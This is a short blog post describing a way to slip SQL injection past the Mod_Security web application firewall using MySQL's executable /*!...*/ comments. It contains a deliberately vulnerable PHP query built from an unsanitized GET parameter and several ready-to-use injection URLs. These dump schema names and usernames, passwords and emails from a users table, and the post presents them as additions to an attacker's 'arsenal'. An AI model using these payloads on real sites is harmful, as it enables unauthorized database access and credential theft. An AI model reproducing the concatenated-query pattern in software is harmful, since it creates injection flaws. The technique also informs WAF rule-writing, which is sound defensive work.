Another fine method to exploit SQL Injection and bypass WAF

A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.

MySQL servers allow one to use comments of the following type:

/*!sql-code*/ and /*!12345sql-code*/

As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that \”sql-code\” should be executed only if the DBMS version is later than the given value.

As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).

Here is a simple example:


$query = \”SELECT name FROM table where id = \”.$_GET[id];

$result = mysql_query($query);


If a web application is protected with Mod_Security, then the following request will be forbidden:

/?id=1+union+select+1

It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/

Well, one more method to our arsenal 🙂

13 thoughts on “Another fine method to exploit SQL Injection and bypass WAF

  1. Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for \”/*!\”. Thanks for the great article and work.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.